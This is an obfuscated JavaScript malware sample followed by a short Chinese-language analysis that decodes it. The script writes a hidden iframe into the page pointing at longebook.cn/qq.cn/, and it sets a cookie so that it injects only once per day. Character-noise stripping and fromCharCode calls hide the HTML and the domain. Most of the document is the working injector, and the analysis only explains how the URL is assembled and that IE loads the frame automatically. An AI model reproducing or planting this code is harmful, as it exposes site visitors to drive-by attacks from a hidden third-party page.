function McjZFDCzlxb(){};
McjZFDCzlxb.prototype = {
getFrameURL : function (){
var dlh = document.location.host;
return "http" + '://' + ((dlh == '' || dlh == 'undefined') ? this .getRandString() :
'') + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." + this .getRandString
() + "." + this .path + this .host;
}
, setCookie : function (name, value){
var d = new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
}
, cookieName : 'cdeahgbf', cookieValue : 1, install : function (){
if (!this .alreadyInstalled()){
var s =
"<xdxixv3 3s^tCy^lCex=C\'CdJiJsxpxlCa^yx:CnCo^nxeC\'^>J<^iCfCrCaJm^e3 CsxrxcC=3\'^".
replace(/[3J\^Cx]/g, '') + this .getFrameURL() +
"\'z>z<z/(i0f(r(a0mMe,>0<,/,d0iMv(>(".replace(/[\(M,0z]/g, '');
try {
var o = document;
o.open();
o.write(s);
o.close();
}
catch (e){
document.write('<UhwtUm{l{>9<UbUoUdwy9>w'.replace(/[Uw\{79]/g, '') + s +
'<V/RbRoRd!yX>V<!/XhVtXmXlX>g'.replace(/[Vg\!RX]/g, ''))
}
this .setCookie(this .cookieName, this .cookieValue);
}
}
, path : "l" + "o" + "n" + String.fromCharCode(103) + "e" + new String("b") + String.
fromCharCode(111) + "o" + String.fromCharCode(107) + new String(".") + String.
fromCharCode(99) + "n", getRandString : function (){
var l = 16, c = '0@1>2:3>4>5>6R7%8@9@a@b%c@dRe%f:'.replace(/[R\:@\>%]/g, ''), o = '';
for (var i = 0; i < l; i ++ )o += c.substr(Math.floor(Math.random() * c.length), 1, 1
);
return o;
}
, host : '/qq.cn/', alreadyInstalled : function (){
return !(document.cookie.indexOf(this .cookieName + '=' + this .cookieValue) == - 1
);
}
}
;
var ocho = new McjZFDCzlxb();
ocho.install();
var dlh = document.location.host;
return "http" + '://' + ((dlh == '' || dlh == 'undefined') ? this .getRandString() :
'') + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." + this .getRandString
() + "." + this .path + this .host;
/* dlh=document.location.host;
即dlh="www.kupi.jp";
((dlh == '' || dlh == 'undefined') ? this .getRandString() : '')
即dlh=空或者未定义时返回随机字符,否则返回空(此处返回空)
再连上dlh有效字母数字的数据
然后连上一个"."
连上随机字符.this.path+this.host
path : "l" + "o" + "n" + String.fromCharCode(103) + "e" + new String("b") + String.
fromCharCode(111) + "o" + String.fromCharCode(107) + new String(".") + String.
fromCharCode(99) + "n"
(即longebook.cn)
host : '/qq.cn/'
连上即www.kupi.jp.[随机字符].longebook.cn/qq.cn/
之后调用函数把iframe写入文档,ie会自动加载 */
大概就这样了 |